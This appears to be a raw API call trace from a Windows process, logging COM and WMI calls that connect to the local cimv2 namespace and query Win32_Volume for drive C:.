	[0195.904] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc318a0, riid=0x1c68c770*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c68c750 | out: ppvObject=0x1c68c750*=0x1cc318a0) returned 0x0
	[0195.905] WbemLocator:IUnknown:Release (This=0x1cc318a0) returned 0x2
	[0195.905] WbemLocator:IUnknown:Release (This=0x1cc318a0) returned 0x1
	[0195.905] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc34510, puCount=0x1c68cb50 | out: puCount=0x1c68cb50*=0x2) returned 0x0
	[0195.905] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=8, puBuffLength=0x1c68cb50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cb50*=0x17, pszText=0x0) returned 0x0
	[0195.905] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=8, puBuffLength=0x1c68cb50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cb50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0195.905] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c68c840 | out: ppv=0x1c68c840*=0x1cc318c0) returned 0x0
	[0195.905] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cc318c0, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c68cad0 | out: ppNamespace=0x1c68cad0*=0x1cc34808) returned 0x0
	[0196.104] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc34808, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c6b8 | out: ppvObject=0x1c68c6b8*=0x1b86df20) returned 0x0
	[0196.104] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b86df20, pProxy=0x1cc34808, pAuthnSvc=0x1c68c6b0, pAuthzSvc=0x1c68c6ac, pServerPrincName=0x1c68c6d8, pAuthnLevel=0x1c68c6a8, pImpLevel=0x1c68c6c4, pAuthInfo=0x1c68c6e8, pCapabilites=0x1c68c6c0 | out: pAuthnSvc=0x1c68c6b0*=0xa, pAuthzSvc=0x1c68c6ac*=0x0, pServerPrincName=0x1c68c6d8, pAuthnLevel=0x1c68c6a8*=0x6, pImpLevel=0x1c68c6c4*=0x2, pAuthInfo=0x1c68c6e8, pCapabilites=0x1c68c6c0*=0x1) returned 0x0
	[0196.104] WbemLocator:IUnknown:Release (This=0x1b86df20) returned 0x1
	[0196.104] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc34808, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c658 | out: ppvObject=0x1c68c658*=0x1b86df60) returned 0x0
	[0196.104] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc34808, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c5e8 | out: ppvObject=0x1c68c5e8*=0x1b86df20) returned 0x0
	[0196.104] WbemLocator:IClientSecurity:SetBlanket (This=0x1b86df20, pProxy=0x1cc34808, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0196.105] WbemLocator:IUnknown:Release (This=0x1b86df20) returned 0x2
	[0196.105] WbemLocator:IUnknown:Release (This=0x1b86df60) returned 0x1
	[0196.105] CoTaskMemFree (pv=0x1b885a10) 
	[0196.105] WbemLocator:IUnknown:Release (This=0x1cc318c0) returned 0x0
	[0196.105] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc34808, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c2d0 | out: ppvObject=0x1c68c2d0*=0x1b86df60) returned 0x0
	[0196.105] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86df60, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c350 | out: ppvObject=0x1c68c350*=0x0) returned 0x80004002
	[0196.150] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86df60, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c0e8 | out: ppvObject=0x1c68c0e8*=0x0) returned 0x80004002
	[0196.157] WbemLocator:IUnknown:AddRef (This=0x1b86df60) returned 0x3
	[0196.157] CoGetContextToken (in: pToken=0x1c68bfa0 | out: pToken=0x1c68bfa0) returned 0x0
	[0196.157] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86df60, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bf60 | out: ppvObject=0x1c68bf60*=0x1b86de48) returned 0x0
	[0196.157] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86de48, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bf90 | out: pCid=0x1c68bf90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0196.157] WbemLocator:IUnknown:Release (This=0x1b86de48) returned 0x3
	[0196.158] CoGetContextToken (in: pToken=0x1c68bf70 | out: pToken=0x1c68bf70) returned 0x0
	[0196.158] WbemLocator:IUnknown:AddRef (This=0x1b86df60) returned 0x4
	[0196.158] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86df60, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c088 | out: ppvObject=0x1c68c088*=0x1b86df30) returned 0x0
	[0196.158] WbemLocator:IUnknown:Release (This=0x1b86df60) returned 0x4
	[0196.158] WbemLocator:IRpcOptions:Query (in: This=0x1b86df30, pPrx=0x1b86df60, dwProperty=2, pdwValue=0x1c68c0f8 | out: pdwValue=0x1c68c0f8) returned 0x80004002
	[0196.158] WbemLocator:IUnknown:Release (This=0x1b86df30) returned 0x3
	[0196.158] WbemLocator:IUnknown:Release (This=0x1b86df60) returned 0x2
	[0196.158] CoGetContextToken (in: pToken=0x1c68c470 | out: pToken=0x1c68c470) returned 0x0
	[0196.158] CoGetContextToken (in: pToken=0x1c68c3b0 | out: pToken=0x1c68c3b0) returned 0x0
	[0196.159] WbemLocator:IUnknown:AddRef (This=0x1b86df60) returned 0x3
	[0196.159] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86df60, riid=0x1c68c4f0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c68c4d0 | out: ppvObject=0x1c68c4d0*=0x1cc34808) returned 0x0
	[0196.159] WbemLocator:IUnknown:Release (This=0x1b86df60) returned 0x3
	[0196.159] WbemLocator:IUnknown:Release (This=0x1cc34808) returned 0x2
	[0196.159] WbemLocator:IUnknown:Release (This=0x1cc34808) returned 0x1
	[0196.159] CoGetContextToken (in: pToken=0x1c68ca70 | out: pToken=0x1c68ca70) returned 0x0
	[0196.159] WbemLocator:IUnknown:AddRef (This=0x1b86df60) returned 0x2
	[0196.159] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86df60, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c640 | out: ppvObject=0x1c68c640*=0x1b86df60) returned 0x0
	[0196.160] WbemLocator:IUnknown:Release (This=0x1b86df60) returned 0x2
	[0196.160] WbemLocator:IUnknown:Release (This=0x1b86df60) returned 0x1
	[0196.160] CoGetContextToken (in: pToken=0x1c68c710 | out: pToken=0x1c68c710) returned 0x0
	[0196.160] CoGetContextToken (in: pToken=0x1c68c650 | out: pToken=0x1c68c650) returned 0x0
	[0196.160] WbemLocator:IUnknown:AddRef (This=0x1b86df60) returned 0x2
	[0196.160] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86df60, riid=0x1c68c790*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c68c770 | out: ppvObject=0x1c68c770*=0x1cc34808) returned 0x0
	[0196.160] WbemLocator:IUnknown:Release (This=0x1b86df60) returned 0x2
	[0196.160] WbemLocator:IUnknown:AddRef (This=0x1cc34808) returned 0x3
	[0196.161] IWbemServices:ExecQuery (in: This=0x1cc34808, strQueryLanguage="WQL", strQuery="select * from Win32_Volume where Name='C:\\\\'", lFlags=16, pCtx=0x0, ppEnum=0x1c68cc08 | out: ppEnum=0x1c68cc08*=0x1cc381d8) returned 0x0
	[0196.167] IUnknown:QueryInterface (in: This=0x1cc381d8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c818 | out: ppvObject=0x1c68c818*=0x1cc381e0) returned 0x0
	[0196.167] IClientSecurity:QueryBlanket (in: This=0x1cc381e0, pProxy=0x1cc381d8, pAuthnSvc=0x1c68c810, pAuthzSvc=0x1c68c80c, pServerPrincName=0x1c68c838, pAuthnLevel=0x1c68c808, pImpLevel=0x1c68c824, pAuthInfo=0x1c68c848, pCapabilites=0x1c68c820 | out: pAuthnSvc=0x1c68c810*=0xa, pAuthzSvc=0x1c68c80c*=0x0, pServerPrincName=0x1c68c838, pAuthnLevel=0x1c68c808*=0x6, pImpLevel=0x1c68c824*=0x2, pAuthInfo=0x1c68c848, pCapabilites=0x1c68c820*=0x1) returned 0x0
	[0196.167] IUnknown:Release (This=0x1cc381e0) returned 0x1
	[0196.167] IUnknown:QueryInterface (in: This=0x1cc381d8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c7b8 | out: ppvObject=0x1c68c7b8*=0x1b86dae0) returned 0x0
	[0196.167] IUnknown:QueryInterface (in: This=0x1cc381d8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c748 | out: ppvObject=0x1c68c748*=0x1cc381e0) returned 0x0
	[0196.167] IClientSecurity:SetBlanket (This=0x1cc381e0, pProxy=0x1cc381d8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0196.173] IUnknown:Release (This=0x1cc381e0) returned 0x2
	[0196.173] WbemLocator:IUnknown:Release (This=0x1b86dae0) returned 0x1
	[0196.173] CoTaskMemFree (pv=0x1b885a70) 
	[0196.173] IUnknown:QueryInterface (in: This=0x1cc381d8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c3f0 | out: ppvObject=0x1c68c3f0*=0x1b86dae0) returned 0x0
	[0196.173] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dae0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c470 | out: ppvObject=0x1c68c470*=0x0) returned 0x80004002
	[0196.202] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dae0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c208 | out: ppvObject=0x1c68c208*=0x0) returned 0x80004002
	[0196.323] WbemLocator:IUnknown:AddRef (This=0x1b86dae0) returned 0x3
	[0196.323] CoGetContextToken (in: pToken=0x1c68c0c0 | out: pToken=0x1c68c0c0) returned 0x0
	[0196.323] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dae0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c080 | out: ppvObject=0x1c68c080*=0x1b86d9c8) returned 0x0
	[0196.323] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86d9c8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68c0b0 | out: pCid=0x1c68c0b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0196.323] WbemLocator:IUnknown:Release (This=0x1b86d9c8) returned 0x3
	[0196.323] CoGetContextToken (in: pToken=0x1c68c090 | out: pToken=0x1c68c090) returned 0x0
	[0196.323] WbemLocator:IUnknown:AddRef (This=0x1b86dae0) returned 0x4
	[0196.323] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dae0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c1a8 | out: ppvObject=0x1c68c1a8*=0x1b86dab0) returned 0x0
	[0196.324] WbemLocator:IUnknown:Release (This=0x1b86dae0) returned 0x4
	[0196.324] WbemLocator:IRpcOptions:Query (in: This=0x1b86dab0, pPrx=0x1b86dae0, dwProperty=2, pdwValue=0x1c68c218 | out: pdwValue=0x1c68c218) returned 0x80004002
	[0196.324] WbemLocator:IUnknown:Release (This=0x1b86dab0) returned 0x3
	[0196.324] WbemLocator:IUnknown:Release (This=0x1b86dae0) returned 0x2
	[0196.324] CoGetContextToken (in: pToken=0x1c68c590 | out: pToken=0x1c68c590) returned 0x0
	[0196.324] CoGetContextToken (in: pToken=0x1c68c4d0 | out: pToken=0x1c68c4d0) returned 0x0
	[0196.324] WbemLocator:IUnknown:AddRef (This=0x1b86dae0) returned 0x3
	[0196.324] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dae0, riid=0x1c68c610*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c5f0 | out: ppvObject=0x1c68c5f0*=0x1cc381d8) returned 0x0
	[0196.324] WbemLocator:IUnknown:Release (This=0x1b86dae0) returned 0x3
	[0196.324] IUnknown:Release (This=0x1cc381d8) returned 0x2
	[0196.325] IUnknown:Release (This=0x1cc381d8) returned 0x1
	[0196.325] WbemLocator:IUnknown:Release (This=0x1cc34808) returned 0x2
	[0196.325] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc34510, puCount=0x1c68cbb0 | out: puCount=0x1c68cbb0*=0x2) returned 0x0
	[0196.325] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68cbb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cbb0*=0x17, pszText=0x0) returned 0x0
	[0196.325] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68cbb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cbb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0196.325] CoGetContextToken (in: pToken=0x1c68c7b0 | out: pToken=0x1c68c7b0) returned 0x0
	[0196.325] CoGetContextToken (in: pToken=0x1c68c6f0 | out: pToken=0x1c68c6f0) returned 0x0
	[0196.325] WbemLocator:IUnknown:AddRef (This=0x1b86dae0) returned 0x2
	[0196.325] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dae0, riid=0x1c68c830*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c810 | out: ppvObject=0x1c68c810*=0x1cc381d8) returned 0x0
	[0196.325] WbemLocator:IUnknown:Release (This=0x1b86dae0) returned 0x2
	[0196.325] IUnknown:AddRef (This=0x1cc381d8) returned 0x3
	[0196.326] IEnumWbemClassObject:Clone (in: This=0x1cc381d8, ppEnum=0x1c68cc70 | out: ppEnum=0x1c68cc70*=0x1cc38368) returned 0x0
	[0196.332] IUnknown:QueryInterface (in: This=0x1cc38368, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c8c8 | out: ppvObject=0x1c68c8c8*=0x1cc38370) returned 0x0
	[0196.332] IClientSecurity:QueryBlanket (in: This=0x1cc38370, pProxy=0x1cc38368, pAuthnSvc=0x1c68c8c0, pAuthzSvc=0x1c68c8bc, pServerPrincName=0x1c68c8e8, pAuthnLevel=0x1c68c8b8, pImpLevel=0x1c68c8d4, pAuthInfo=0x1c68c8f8, pCapabilites=0x1c68c8d0 | out: pAuthnSvc=0x1c68c8c0*=0xa, pAuthzSvc=0x1c68c8bc*=0x0, pServerPrincName=0x1c68c8e8, pAuthnLevel=0x1c68c8b8*=0x6, pImpLevel=0x1c68c8d4*=0x2, pAuthInfo=0x1c68c8f8, pCapabilites=0x1c68c8d0*=0x1) returned 0x0
	[0196.333] IUnknown:Release (This=0x1cc38370) returned 0x1
	[0196.333] IUnknown:QueryInterface (in: This=0x1cc38368, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c868 | out: ppvObject=0x1c68c868*=0x1b86e260) returned 0x0
	[0196.333] IUnknown:QueryInterface (in: This=0x1cc38368, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c7f8 | out: ppvObject=0x1c68c7f8*=0x1cc38370) returned 0x0
	[0196.333] IClientSecurity:SetBlanket (This=0x1cc38370, pProxy=0x1cc38368, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0196.336] IUnknown:Release (This=0x1cc38370) returned 0x2
	[0196.336] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x1
	[0196.336] CoTaskMemFree (pv=0x1b8859e0) 
	[0196.336] IUnknown:QueryInterface (in: This=0x1cc38368, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c490 | out: ppvObject=0x1c68c490*=0x1b86e260) returned 0x0
	[0196.336] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c510 | out: ppvObject=0x1c68c510*=0x0) returned 0x80004002
	[0196.337] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c2a8 | out: ppvObject=0x1c68c2a8*=0x0) returned 0x80004002
	[0196.341] WbemLocator:IUnknown:AddRef (This=0x1b86e260) returned 0x3
	[0196.341] CoGetContextToken (in: pToken=0x1c68c160 | out: pToken=0x1c68c160) returned 0x0
	[0196.342] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c120 | out: ppvObject=0x1c68c120*=0x1b86e148) returned 0x0
	[0196.342] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86e148, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68c150 | out: pCid=0x1c68c150*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0196.342] WbemLocator:IUnknown:Release (This=0x1b86e148) returned 0x3
	[0196.342] CoGetContextToken (in: pToken=0x1c68c130 | out: pToken=0x1c68c130) returned 0x0
	[0196.342] WbemLocator:IUnknown:AddRef (This=0x1b86e260) returned 0x4
	[0196.342] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c248 | out: ppvObject=0x1c68c248*=0x1b86e230) returned 0x0
	[0196.342] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x4
	[0196.342] WbemLocator:IRpcOptions:Query (in: This=0x1b86e230, pPrx=0x1b86e260, dwProperty=2, pdwValue=0x1c68c2b8 | out: pdwValue=0x1c68c2b8) returned 0x80004002
	[0196.343] WbemLocator:IUnknown:Release (This=0x1b86e230) returned 0x3
	[0196.343] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x2
	[0196.343] CoGetContextToken (in: pToken=0x1c68c630 | out: pToken=0x1c68c630) returned 0x0
	[0196.343] CoGetContextToken (in: pToken=0x1c68c570 | out: pToken=0x1c68c570) returned 0x0
	[0196.343] WbemLocator:IUnknown:AddRef (This=0x1b86e260) returned 0x3
	[0196.343] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x1c68c6b0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c690 | out: ppvObject=0x1c68c690*=0x1cc38368) returned 0x0
	[0196.343] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x3
	[0196.343] IUnknown:Release (This=0x1cc38368) returned 0x2
	[0196.343] IUnknown:Release (This=0x1cc38368) returned 0x1
	[0196.344] IUnknown:Release (This=0x1cc381d8) returned 0x2
	[0196.344] CoGetContextToken (in: pToken=0x1c68ca30 | out: pToken=0x1c68ca30) returned 0x0
	[0196.344] CoGetContextToken (in: pToken=0x1c68c970 | out: pToken=0x1c68c970) returned 0x0
	[0196.344] WbemLocator:IUnknown:AddRef (This=0x1b86e260) returned 0x2
	[0196.344] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x1c68cab0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68ca90 | out: ppvObject=0x1c68ca90*=0x1cc38368) returned 0x0
	[0196.344] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x2
	[0196.344] IUnknown:AddRef (This=0x1cc38368) returned 0x3
	[0196.344] IEnumWbemClassObject:Reset (This=0x1cc38368) returned 0x0
	[0196.346] IUnknown:Release (This=0x1cc38368) returned 0x2
	[0196.346] CoTaskMemAlloc (cb=0x8) returned 0x1b88a250
	[0196.346] IEnumWbemClassObject:Next (in: This=0x1cc38368, lTimeout=-1, uCount=0x1, apObjects=0x1b88a250, puReturned=0x1c68ccb8 | out: apObjects=0x1b88a250*=0x1cc38410, puReturned=0x1c68ccb8*=0x1) returned 0x0
	[0196.604] IUnknown:QueryInterface (in: This=0x1cc38410, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bfe0 | out: ppvObject=0x1c68bfe0*=0x1cc38410) returned 0x0
	[0196.605] IUnknown:QueryInterface (in: This=0x1cc38410, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c060 | out: ppvObject=0x1c68c060*=0x0) returned 0x80004002
	[0196.605] IUnknown:QueryInterface (in: This=0x1cc38410, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bdf8 | out: ppvObject=0x1c68bdf8*=0x0) returned 0x80004002
	[0196.605] IUnknown:AddRef (This=0x1cc38410) returned 0x3
	[0196.606] CoGetContextToken (in: pToken=0x1c68bcb0 | out: pToken=0x1c68bcb0) returned 0x0
	[0196.606] IUnknown:QueryInterface (in: This=0x1cc38410, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bc70 | out: ppvObject=0x1c68bc70*=0x1cc38418) returned 0x0
